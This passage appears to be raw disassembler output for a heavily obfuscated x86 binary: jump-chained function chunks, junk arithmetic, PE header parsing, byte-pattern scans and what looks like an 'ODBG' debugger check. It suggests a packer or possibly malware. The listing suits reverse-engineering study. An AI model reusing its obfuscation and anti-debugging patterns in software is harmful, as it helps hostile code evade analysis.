retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428620
loc_42211B: ; CODE XREF: sub_428620+E�j
jmp loc_422002
; END OF FUNCTION CHUNK FOR sub_428620
; ---------------------------------------------------------------------------
loc_422120: ; CODE XREF: _94j21ax3:004229D8�j
call sub_42C057
test al, al
jz loc_427153
jmp loc_421CB6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_211. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_422133: ; CODE XREF: sub_4294B3-52EE�j
jmp loc_4268DC
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428FFB
loc_422138: ; CODE XREF: sub_428FFB:loc_42693D�j
; _94j21ax3:loc_42BCFD�j
pop eax
add eax, 0DDD9BFE6h
add eax, ebp
; END OF FUNCTION CHUNK FOR sub_428FFB
; =============== S U B R O U T I N E =======================================
sub_422141 proc near ; CODE XREF: sub_42C5E8-555�j
; FUNCTION CHUNK AT 00425A8A SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00426F26 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A885 SIZE 00000010 BYTES
push ebx
push 99199705h
pop ebx
jmp loc_425A8A
sub_422141 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_42214D: ; CODE XREF: sub_4294B3:loc_42529E�j
; sub_4294B3-26E6�j
push 0
push 0
push 10h
mov eax, [ebp-8]
push eax
; END OF FUNCTION CHUNK FOR sub_4294B3
; START OF FUNCTION CHUNK FOR sub_423324
loc_422157: ; CODE XREF: sub_423324:loc_422080�j
call sub_42BA8A
jmp loc_429F68
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42265F
loc_422161: ; CODE XREF: sub_42265F:loc_422665�j
pop esi
mov eax, ds:dword_42C230
or eax, eax
jnz loc_42B826
jmp loc_42532B
; END OF FUNCTION CHUNK FOR sub_42265F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F9E
loc_422175: ; CODE XREF: sub_426F9E:loc_429F32�j
mov ebp, esp
add esp, 0FFFFFFECh
cmp ds:byte_426F58, 0
jnz loc_428468
lea edx, [ebp-14h]
jmp loc_424BBE
; END OF FUNCTION CHUNK FOR sub_426F9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421DC4
loc_42218F: ; CODE XREF: sub_421DC4:loc_421DF3�j
mov eax, [eax]
add eax, [ebp-4]
add eax, 18h
jmp loc_42192E
; END OF FUNCTION CHUNK FOR sub_421DC4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_42219C: ; CODE XREF: sub_423F55:loc_427E01�j
xor eax, eax
call sub_4244A5
; END OF FUNCTION CHUNK FOR sub_423F55
; =============== S U B R O U T I N E =======================================
sub_4221A3 proc near ; CODE XREF: _94j21ax3:004276BA�j
; _94j21ax3:00428D0D�p
mov [esp+0], eax
pop eax
cmp dword ptr [eax], 4742444Fh
jz loc_42A566
jmp loc_427418
sub_4221A3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4221B8 proc near ; CODE XREF: sub_42284F-CB6�p
; _94j21ax3:00425ABC�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00421375 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042416F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425A2A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00426E03 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004271B5 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00427307 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00427F89 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00429017 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429356 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AAF3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AC71 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AF73 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042B942 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042BAB1 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
push 46F68736h
pop edi
jmp loc_42AC71
sub_4221B8 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_106. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_4221C8: ; CODE XREF: sub_423F55:loc_422C43�j
test al, al
jnz loc_42C454
mov eax, [ebp-4]
cmp byte ptr [eax], 0E8h
jnz loc_426C90
jmp loc_4233A9
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
add esp, 10h
pop ebp
call sub_424791
; START OF FUNCTION CHUNK FOR sub_4244BB
loc_4221EA: ; CODE XREF: sub_4244BB+16�j
jmp sub_4239A5
; END OF FUNCTION CHUNK FOR sub_4244BB
; ---------------------------------------------------------------------------
not ecx
jmp sub_42270C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4244A5
loc_4221F6: ; CODE XREF: sub_4244A5:loc_423100�j
pop esi
xor esi, 0DE8BD8ABh
add esi, 0C8F1791Dh
mov [esi], eax
pop esi
jmp nullsub_33
; END OF FUNCTION CHUNK FOR sub_4244A5
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42220B proc near ; DATA XREF: sub_4236B8:loc_4236B9�o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004213DB SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00427F5F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042B101 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042B7EF SIZE 0000000B BYTES
mov ebp, esp
push ecx
mov [ebp+var_4], eax
call sub_428A7E
xchg ebx, edx
jmp loc_4213DB
sub_42220B endp
; ---------------------------------------------------------------------------
loc_42221D: ; CODE XREF: _94j21ax3:00427A8A�j
not esi
; =============== S U B R O U T I N E =======================================
sub_42221F proc near ; CODE XREF: sub_4244A5:loc_4230FB�p
; FUNCTION CHUNK AT 0042A125 SIZE 00000008 BYTES
xchg esi, [esp+0]
pop esi
mov eax, [ebp-4]
add eax, 3Ch
jmp loc_42A125
sub_42221F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
add esi, 8A7668A0h
cmp edx, eax
jmp loc_42894E
; ---------------------------------------------------------------------------
loc_42223B: ; DATA XREF: sub_42A7A6:loc_42242C�o
call sub_4239A5
mov [ebp-4], eax
loc_422243: ; CODE XREF: _94j21ax3:00425B87�j
cmp dword ptr [ebp-4], 0
jz loc_424949
jmp loc_42B66C
; ---------------------------------------------------------------------------
loc_422252: ; CODE XREF: _94j21ax3:0042C1D8�j
cmp ebp, edi
jmp loc_42A215
; ---------------------------------------------------------------------------
push esi
or esi, ecx
jmp sub_42A5A2
; ---------------------------------------------------------------------------
db 70h, 7Dh, 0
dword_422264 dd 754h ; DATA XREF: _94j21ax3:loc_4216EB�w
; sub_42131B:loc_424C06�w ...
dword_422268 dd 4EEFA8ECh ; DATA XREF: sub_426809-5766�w
; ---------------------------------------------------------------------------
loc_42226C: ; CODE XREF: _94j21ax3:0042A001�j
jmp locret_4249A3
; ---------------------------------------------------------------------------
db 3, 0B1h, 25h
dword_422274 dd 77D40000h ; DATA XREF: sub_421402:loc_4244D6�w
; sub_428993+3�r ...
dword_422278 dd 0E42B6E57h, 325C4699h ; DATA XREF: sub_421F28+2752�o
; sub_428993-B66�o
; ---------------------------------------------------------------------------
mov byte ptr [ebx], 0
; START OF FUNCTION CHUNK FOR sub_425330
loc_422283: ; CODE XREF: sub_425330:loc_425341�j
jmp loc_426E2E
; END OF FUNCTION CHUNK FOR sub_425330
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422866
loc_422288: ; CODE XREF: sub_422866+13BD�j
jmp loc_429E97
; END OF FUNCTION CHUNK FOR sub_422866
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_42228D: ; CODE XREF: sub_423614+13�j
jmp loc_42705F
; END OF FUNCTION CHUNK FOR sub_423614
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A2B1
loc_422292: ; CODE XREF: sub_42A2B1:loc_429D0F�j
add esi, 0E56C24F0h
add esi, ebp
call sub_42A9D8
; END OF FUNCTION CHUNK FOR sub_42A2B1
; START OF FUNCTION CHUNK FOR sub_425330
loc_42229F: ; CODE XREF: sub_425330+4D01�j
jmp loc_429850
; END OF FUNCTION CHUNK FOR sub_425330
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BD03
loc_4222A4: ; CODE XREF: sub_42BD03-987B�j
; sub_42BD03:loc_423201�j
mov eax, [ebp-4]
mov eax, [eax]
and eax, 0FFFFFFh
cmp eax, 0C3C033h
jmp loc_42B3BF
; END OF FUNCTION CHUNK FOR sub_42BD03
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A83
loc_4222B8: ; CODE XREF: sub_426A83+17�j
push eax
call sub_42780F
call sub_423F55
loc_4222C3: ; CODE XREF: sub_429CAE-D18�j
jmp nullsub_37
; END OF FUNCTION CHUNK FOR sub_426A83
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_4222C8: ; CODE XREF: sub_423FCD-2275�j
cmp edi, 80000001h
jbe loc_423047
jmp loc_42AF89
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
locret_4222D9: ; CODE XREF: _94j21ax3:loc_424C98�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EBB
loc_4222DA: ; CODE XREF: sub_428EBB:loc_428ED5�j
pop ecx
shl eax, 7
mov edx, [ebp+8]
mov edx, [edx-8]
or edx, 40h
or eax, edx
mov edx, [ebp+8]
mov [edx-8], eax
jmp loc_42AE45
; END OF FUNCTION CHUNK FOR sub_428EBB
; ---------------------------------------------------------------------------
push 0F33E9CE3h
ror ebp, 10h
jmp sub_423717
; ---------------------------------------------------------------------------
or ebp, 0F6C1B216h
adc ebp, 30C38C31h
jmp sub_425448
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425819
loc_422312: ; CODE XREF: sub_425819-129C�j
pop eax
jmp loc_425053
; ---------------------------------------------------------------------------
loc_422318: ; CODE XREF: sub_425819+13FE�j
xor eax, ecx
add ecx, eax
push offset loc_42567C
jmp loc_428B33
; END OF FUNCTION CHUNK FOR sub_425819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422048
loc_422326: ; CODE XREF: sub_422048:loc_4220B2�j
cmp dword ptr [ebp-4], 0
jz loc_427103
mov eax, [ebp-4]
add eax, 3Ch
mov eax, [eax]
add eax, [ebp-4]
jmp loc_424D40
; END OF FUNCTION CHUNK FOR sub_422048
; ---------------------------------------------------------------------------
xor edi, eax
jmp sub_42AFFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AE5A
loc_422347: ; CODE XREF: sub_42AE5A:loc_428FE7�j
cmp ebx, 0E708E4EAh
cmp edx, 6FAFA168h
and ecx, ebx
push edi
push 93459B86h
pop edi
or edi, 0C3DC47DDh
rol edi, 15h
jmp loc_425FD4
; END OF FUNCTION CHUNK FOR sub_42AE5A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42236A: ; CODE XREF: sub_42284F+6EA3�j
jz loc_4270B0
jmp loc_4230C9
; END OF FUNCTION CHUNK FOR sub_42284F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_26. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
pop ecx
jmp sub_424692
; =============== S U B R O U T I N E =======================================
sub_42237C proc near ; CODE XREF: sub_423324-18B0�p
xchg ebp, [esp+0]
mov ebp, [esp+0]
xchg eax, ebp
ror eax, 0Dh
mov ds:dword_424090, eax
jmp nullsub_14
sub_42237C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422392 proc near ; CODE XREF: sub_42A3EE�j
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004211D8 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00421AE9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422CD3 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 004241A8 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004273EB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004291F5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A188 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A28E SIZE 0000000B BYTES
push ebp
mov ebp, esp
jmp loc_4273EB
sub_422392 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_46. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_42239B: ; CODE XREF: sub_42A0CC-1B17�j
jmp nullsub_93
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAD4
loc_4223A0: ; CODE XREF: _94j21ax3:004219E9�j
; sub_42BAD4+3�j
inc dword ptr [ebp-18h]
push offset loc_421E9F
jmp nullsub_169
; END OF FUNCTION CHUNK FOR sub_42BAD4
; ---------------------------------------------------------------------------
mov edx, [ebp+0]
cmp esi, 0B47AA71Ch
loc_4223B6: ; CODE XREF: _94j21ax3:loc_425162�j
jmp loc_4254A8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_4223BB: ; CODE XREF: sub_42C1AE-B0B9�j
rol esi, 9
jmp loc_424ECD
; END OF FUNCTION CHUNK FOR sub_42C1AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_4223C3: ; CODE XREF: sub_423324+2323�j
jg loc_423AED
loc_4223C9: ; CODE XREF: sub_424C37:loc_4240E3�j
push 0F3CBF4A2h
add [esp+0Ch+var_C], 0C340B5Eh
push edx
jmp loc_42C20C
; ---------------------------------------------------------------------------
loc_4223DB: ; CODE XREF: sub_423324+1096�j
jle loc_425AB3
add edx, edi
push ebx
jb loc_421FFD
jmp loc_42BEC6
; END OF FUNCTION CHUNK FOR sub_423324
; =============== S U B R O U T I N E =======================================
sub_4223EF proc near ; DATA XREF: sub_423324:loc_422F46�o
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0042B98C SIZE 0000000A BYTES
mov eax, [ebp-14h]
mov eax, [eax+20h]
add eax, [ebp-4]
xor edx, edx
push edx
push eax
jmp loc_42B98C
sub_4223EF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_422401 proc near ; CODE XREF: sub_422058+E�p
; sub_422C48+6903�j
xchg eax, [esp+0]
pop eax
call sub_4239A5
call sub_424320
loc_42240F: ; CODE XREF: sub_42A77E+E�j
jmp nullsub_71
sub_422401 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422A20
loc_422414: ; CODE XREF: sub_422A20+17�j
jmp loc_42749D
; END OF FUNCTION CHUNK FOR sub_422A20
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_185. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_192. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425157
loc_42241B: ; CODE XREF: sub_425157+6�j
jmp loc_4275C6
; END OF FUNCTION CHUNK FOR sub_425157
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A7A6
loc_422420: ; CODE XREF: sub_42A7A6:loc_4217D7�j
add edx, 0A60F73D1h
xor edx, 0ADDDBE9Ch
loc_42242C: ; CODE XREF: _94j21ax3:00424144�j
push offset loc_42223B
jmp nullsub_114
; END OF FUNCTION CHUNK FOR sub_42A7A6
; =============== S U B R O U T I N E =======================================
sub_422436 proc near ; DATA XREF: _94j21ax3:004264D2�o
; FUNCTION CHUNK AT 00428175 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004295E3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B458 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0042C393 SIZE 0000000B BYTES
test eax, eax
jnz loc_4225C8
jmp loc_428175
sub_422436 endp
; ---------------------------------------------------------------------------
and edx, 0F6FDF6D7h
jnz loc_42A2F1
jmp sub_4251D5
; ---------------------------------------------------------------------------
adc ebp, esi
jmp sub_421A4F
; ---------------------------------------------------------------------------
adc ebp, esi
jmp sub_4281A5
; ---------------------------------------------------------------------------
loc_422462: ; CODE XREF: _94j21ax3:0042897C�j
rol esi, 1Ah
or esi, 0E49D7C1Fh
test esi, 40000h
jmp loc_4210D7
; ---------------------------------------------------------------------------
xor ecx, 2430B18Ah
jmp loc_422E54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BD03
loc_422481: ; CODE XREF: sub_42BD03-8AFC�j
sbb eax, edi
sbb ebp, ecx
ror esi, 19h
jmp loc_4222A4
; END OF FUNCTION CHUNK FOR sub_42BD03
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B77
loc_42248D: ; CODE XREF: sub_425B77-1B3B�j
xchg edx, [esp+0]
jmp sub_42A8BB
; END OF FUNCTION CHUNK FOR sub_425B77
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_422495: ; CODE XREF: sub_421D33+A581�j
or eax, eax
jnz loc_4249A4
jmp loc_42783E
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4224A2: ; CODE XREF: sub_42284F:loc_423946�j
jz sub_42773C
jmp loc_42AB95
; END OF FUNCTION CHUNK FOR sub_42284F
; =============== S U B R O U T I N E =======================================
sub_4224AD proc near ; DATA XREF: sub_42C0BC-3B3E�o
add eax, edi
pop edi
call sub_4281A5
sub_4224AD endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_426FE1
loc_4224B5: ; CODE XREF: sub_426FE1+13�j
jmp loc_429705
; END OF FUNCTION CHUNK FOR sub_426FE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4267C6
loc_4224BA: ; CODE XREF: sub_4267C6+16�j
jmp loc_424A2A
; END OF FUNCTION CHUNK FOR sub_4267C6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_186. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_4224C0: ; CODE XREF: sub_422EB0+DA�j
; sub_422E59:loc_428B18�j
xor eax, eax
mov [ebp-8], eax
loc_4224C5: ; CODE XREF: sub_422EB0+7249�j
; _94j21ax3:loc_42BBDE�j
jnz loc_423FEC
mov eax, [ebp-8]
jmp loc_42A0EA
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
test ecx, eax
jmp loc_425AFA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429447
loc_4224DA: ; CODE XREF: sub_429447:loc_42945A�j
mov [ecx], eax
pop ecx
mov eax, [ebp-4]
mov ecx, offset sub_4274BF
jmp loc_424293
; END OF FUNCTION CHUNK FOR sub_429447
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423284
loc_4224EA: ; CODE XREF: sub_423284:loc_4265BD�j
jnb sub_42B706
add esp, 0FFFFFFF4h
mov [ebp-8], edx
mov [ebp-4], eax
jmp loc_42B06F
; END OF FUNCTION CHUNK FOR sub_423284
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BF1B
loc_4224FE: ; CODE XREF: sub_42BF1B:loc_42BF20�j
mov [ebp-1Ch], eax
lea eax, [ebp-125h]
mov [ebp-20h], eax
loc_42250A: ; CODE XREF: _94j21ax3:00429C92�j
mov eax, [ebp-1Ch]
push offset loc_427E93
; END OF FUNCTION CHUNK FOR sub_42BF1B
; START OF FUNCTION CHUNK FOR sub_42BAD4
loc_422512: ; CODE XREF: sub_42BAD4:loc_425B27�j
jmp nullsub_170
; END OF FUNCTION CHUNK FOR sub_42BAD4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_422517: ; CODE XREF: sub_4294B3:loc_4256AC�j
jz loc_429800
jmp loc_424E69
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_422522: ; CODE XREF: sub_4272E9:loc_421553�j
jnz loc_42C27C
jmp loc_4232E5
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
loc_42252D: ; CODE XREF: _94j21ax3:loc_426B1F�j
add eax, 56FECD8Fh
jmp loc_427F03
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422538 proc near ; CODE XREF: sub_426612�j
; FUNCTION CHUNK AT 00424E8E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042722A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042905F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042BD8A SIZE 00000005 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
cmp ds:dword_4256CC, 0
jnz loc_42905F
push 7093F41Ch
pop edx
jmp loc_42BD8A
sub_422538 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4281A5
loc_422556: ; CODE XREF: sub_4281A5:loc_428B87�j
jz loc_424A79
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jz loc_424A79
call sub_4269EC
loc_42256D: ; CODE XREF: sub_4272E9-117�j
jnz loc_424A79
mov eax, ebx
jmp loc_424A7B
; ---------------------------------------------------------------------------
loc_42257A: ; CODE XREF: sub_4281A5:loc_42933E�j
mov ecx, [ebx+3Ch]
jmp loc_42C3D1
; END OF FUNCTION CHUNK FOR sub_4281A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42134B
loc_422582: ; CODE XREF: sub_42134B:loc_42742B�j
cmp dword ptr [ebp-8], 0
jz loc_421D73
jmp loc_429BF1
; END OF FUNCTION CHUNK FOR sub_42134B
; =============== S U B R O U T I N E =======================================
sub_422591 proc near ; CODE XREF: sub_4235AE+8�p
mov [esp+0], edx
pop edx
call sub_429BC2
test eax, eax
sub_422591 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_42259C: ; CODE XREF: sub_42C0BC:loc_428E26�j
setnz byte ptr [ebp-1]
jmp loc_428C05
; END OF FUNCTION CHUNK FOR sub_42C0BC
; =============== S U B R O U T I N E =======================================
sub_4225A5 proc near ; DATA XREF: sub_422FDC:loc_421310�o
; FUNCTION CHUNK AT 004232BD SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00424061 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004266E6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004280DE SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00429CEC SIZE 00000019 BYTES
mov eax, 6
sub eax, [ebp-4]
mov [ebp-4], eax
jmp loc_4232BD
sub_4225A5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4225B5 proc near ; CODE XREF: sub_423F55+295�p
; sub_423F55+CFE�p
; FUNCTION CHUNK AT 0042A05C SIZE 00000005 BYTES
push ebp
mov ebp, esp
push offset sub_427849
jmp loc_42A05C
sub_4225B5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421CAA
loc_4225C2: ; CODE XREF: sub_421CAA+7CE3�j
jnb loc_42B110
loc_4225C8: ; CODE XREF: sub_422436+2�j
; sub_421CAA:loc_4280D3�j ...
push 0C2AC2E7h
pop eax
and eax, 0E6D145CBh
jmp loc_42734A
; END OF FUNCTION CHUNK FOR sub_421CAA
; =============== S U B R O U T I N E =======================================
sub_4225D9 proc near ; DATA XREF: _94j21ax3:0042151C�o
call dword ptr [ebp-4]
sub_4225D9 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_423FE1
loc_4225DC: ; CODE XREF: sub_423FE1+6�j
; sub_422E59+2A5C�j
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_423FE1
; ---------------------------------------------------------------------------
loc_4225E0: ; CODE XREF: _94j21ax3:00427425�j
jo loc_42AFB2
pushf
jmp loc_42C4BC
; ---------------------------------------------------------------------------
mov edx, 63B18ECh
ror edx, 5
jmp sub_42A791
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425790
loc_4225F9: ; CODE XREF: sub_425790-41D9�j
call sub_421CAA
loc_4225FE: ; CODE XREF: sub_42A9E7-2F47�j
jmp loc_422C60
; END OF FUNCTION CHUNK FOR sub_425790
; ---------------------------------------------------------------------------
loc_422603: ; CODE XREF: _94j21ax3:00427CE5�j
and ebp, 9F822041h
; =============== S U B R O U T I N E =======================================
sub_422609 proc near ; CODE XREF: sub_423324-183�p
arg_0 = dword ptr 4
xchg esi, [esp+0]
pop esi
xchg esi, [esp-4+arg_0]
jmp sub_42574E
sub_422609 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_422615: ; CODE XREF: _94j21ax3:loc_423B20�j
; _94j21ax3:00424997�j
push ecx
call sub_4229FB
mov esi, ebp
adc ebx, 0DCADA5E6h
jmp sub_422058
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42982D
loc_422628: ; CODE XREF: sub_42982D:loc_427149�j
jz loc_42324A
jmp loc_42978D
; END OF FUNCTION CHUNK FOR sub_42982D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_422633: ; CODE XREF: sub_421689:loc_4267AE�j
; _94j21ax3:004267C1�j
xor edi, 0AEE8B143h
add edi, ebp
add edi, 51375EC1h
mov [edi], eax
pop edi
cmp dword ptr [ebp-4], 0
jz loc_424955
jmp loc_4257AC
; END OF FUNCTION CHUNK FOR sub_421689
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AE5A
loc_422653: ; CODE XREF: sub_42AE5A+18�j
test edx, 1
jmp loc_4291E7
; END OF FUNCTION CHUNK FOR sub_42AE5A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_83. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42265F proc near ; CODE XREF: sub_425475+4�p
; FUNCTION CHUNK AT 00422161 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042317F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429215 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042B826 SIZE 00000008 BYTES
push ebp
call sub_4266F6
loc_422665: ; CODE XREF: _94j21ax3:0042BCF8�j
jmp loc_422161
sub_42265F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42266A proc near ; CODE XREF: _94j21ax3:0042953B�j
; sub_42266A+9CC2�p
; FUNCTION CHUNK AT 00421789 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422B6D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042650F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427C40 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428E3E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429585 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C324 SIZE 0000001A BYTES
xchg ebx, [esp+0]
pop ebx
pop eax
cmp dword ptr [eax], 0
jmp loc_42650F
sub_42266A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_422677: ; CODE XREF: _94j21ax3:00422BC7�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429CAE
loc_422678: ; CODE XREF: sub_429CAE:loc_42930D�j
pop eax
xor eax, ds:4000F6h
and eax, 14D8BF16h
add eax, 0FFB19E54h
mov eax, [eax]
or eax, eax
jnz loc_423688
jmp loc_422F2E
; END OF FUNCTION CHUNK FOR sub_429CAE
; =============== S U B R O U T I N E =======================================
sub_42269A proc near ; CODE XREF: sub_4259BF+5167�p
; _94j21ax3:0042AC11�j
; FUNCTION CHUNK AT 00424618 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00428757 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428F60 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429E3C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00429FE3 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042B0B8 SIZE 00000011 BYTES
xchg edx, [esp+0]
pop edx
mov edx, 0E996F72Eh
push ecx
push 4E826A23h
jmp loc_424618
sub_42269A endp
; =============== S U B R O U T I N E =======================================
sub_4226AE proc near ; DATA XREF: sub_423324:loc_42AA44�o
; FUNCTION CHUNK AT 00421783 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AF53 SIZE 00000020 BYTES
push ebx
push 0DDF6AF05h
pop ebx
xor ebx, 0B8BFE1FFh
or ebx, ds:4000F4h
jmp loc_421783
sub_4226AE endp
; ---------------------------------------------------------------------------
